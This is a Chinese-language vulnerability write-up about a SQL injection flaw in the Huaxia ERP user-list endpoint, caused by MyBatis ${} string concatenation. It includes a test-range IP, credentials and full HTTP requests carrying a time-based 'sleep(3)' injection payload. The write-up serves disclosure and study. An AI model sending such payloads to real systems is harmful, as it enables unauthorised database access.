华夏ERP存在SQL注入漏洞

2021年5月27日15:30:11评论88 views字数 2106阅读7分1秒阅读模式

测试靶场

靶场地址	http://47.116.69.14
账户密码	jsh	123456

1、描述

华夏ERP基于SpringBoot框架和SaaS模式，可以算作是国内人气比较高的一款ERP项目，但经过源码审计发现其存在多个漏洞，本篇为SQL注入漏洞解析。

2、影响范围

华夏ERP

3、漏洞复现

从开源项目本地搭建来进行审计，源码下载地址：

百度网盘 https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw 提取码:814g

漏洞复现：

1、漏洞代码位置

src/main/resources/mapper_xml/UserMapperEx.xml

华夏ERP存在SQL注入漏洞

使用mybatis时 ${} 会对参数和sql语句进行拼接，因而存在sql注入漏洞

2、漏洞验证

正常查询

华夏ERP存在SQL注入漏洞

GET /user/list?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22q%22%2C%22offset%22%3A%221%22%2C%22rows%22%3A%221%22%7D&currentPage=1&pageSize=10&t=1615274773529 HTTP/1.1Host: 47.116.69.14User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://47.116.69.14/pages/manage/user.htmlCookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274745; JSESSIONID=C5EBD91E0E68081AA25F206F2FECAC82; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274770

使用sleep延时注入

华夏ERP存在SQL注入漏洞

GET /user/list?search=%7B%22userName%22%3A%22'and+sleep(3)--%22%2C%22loginName%22%3A%22q%22%2C%22offset%22%3A%221%22%2C%22rows%22%3A%221%22%7D&currentPage=1&pageSize=10&t=1615274773529 HTTP/1.1Host: 47.116.69.14User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://47.116.69.14/pages/manage/user.htmlCookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274745; JSESSIONID=C5EBD91E0E68081AA25F206F2FECAC82; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274770